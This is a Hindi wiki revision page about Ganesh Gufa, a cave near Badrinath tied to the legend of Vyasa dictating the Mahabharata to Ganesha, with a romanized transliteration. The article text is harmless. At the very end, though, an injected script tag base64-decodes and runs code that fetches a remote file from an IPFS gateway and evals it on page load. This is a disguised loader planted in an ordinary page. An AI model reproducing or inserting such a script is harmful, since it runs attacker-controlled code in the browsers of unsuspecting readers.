Difference between revisions of "गणेश गुफ़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गणेश गुफ़ा''' गढ़वाल ज़िला, उत्तरांचल में [[बदरीना...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 
'''गणेश गुफ़ा''' [[गढ़वाल]] ज़िला, [[उत्तरांचल]] में [[बदरीनाथ]] से बसुंधरा जाने वाले मार्ग पर व्यास गुफ़ा के सन्निकट स्थित है।
 
'''गणेश गुफ़ा''' [[गढ़वाल]] ज़िला, [[उत्तरांचल]] में [[बदरीनाथ]] से बसुंधरा जाने वाले मार्ग पर व्यास गुफ़ा के सन्निकट स्थित है।
  
*किवदंती के अनुसार यह माना जाता है कि व्यास गुफ़ा में रहते हुए ही [[महर्षि व्यास]] ने [[महाभारत]] तथा [[पुराण|पुराणों]] की रचना की थी। महाभारत की प्रसिद्ध कथा, जिसके अनुसार इस [[महाकाव्य]] को लिखने के लिए व्यास जी ने भगवान [[गणेश]] को चुना था, गणेश गुफ़ा से संबंधित है।
+
*किवदंती के अनुसार यह माना जाता है कि व्यास गुफ़ा में रहते हुए ही [[महर्षि व्यास]] ने [[महाभारत]] तथा [[पुराण|पुराणों]] की रचना की थी।
 +
*महाभारत की प्रसिद्ध कथा, जिसके अनुसार इस [[महाकाव्य]] को लिखने के लिए व्यास जी ने भगवान [[गणेश]] को चुना था, गणेश गुफ़ा से संबंधित है।
 
*व्यास का बदरीनाथ से संबंध भी जनश्रुति में प्रसिद्ध है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=277|url=}}</ref>
 
*व्यास का बदरीनाथ से संबंध भी जनश्रुति में प्रसिद्ध है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=277|url=}}</ref>
  

Latest revision as of 11:53, 11 November 2012

ganesh gufa gadhaval zila, uttaraanchal mean badarinath se basuandhara jane vale marg par vyas gufa ke sannikat sthit hai.

  • kivadanti ke anusar yah mana jata hai ki vyas gufa mean rahate hue hi maharshi vyas ne mahabharat tatha puranoan ki rachana ki thi.
  • mahabharat ki prasiddh katha, jisake anusar is mahakavy ko likhane ke lie vyas ji ne bhagavan ganesh ko chuna tha, ganesh gufa se sanbandhit hai.
  • vyas ka badarinath se sanbandh bhi janashruti mean prasiddh hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 277 |

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>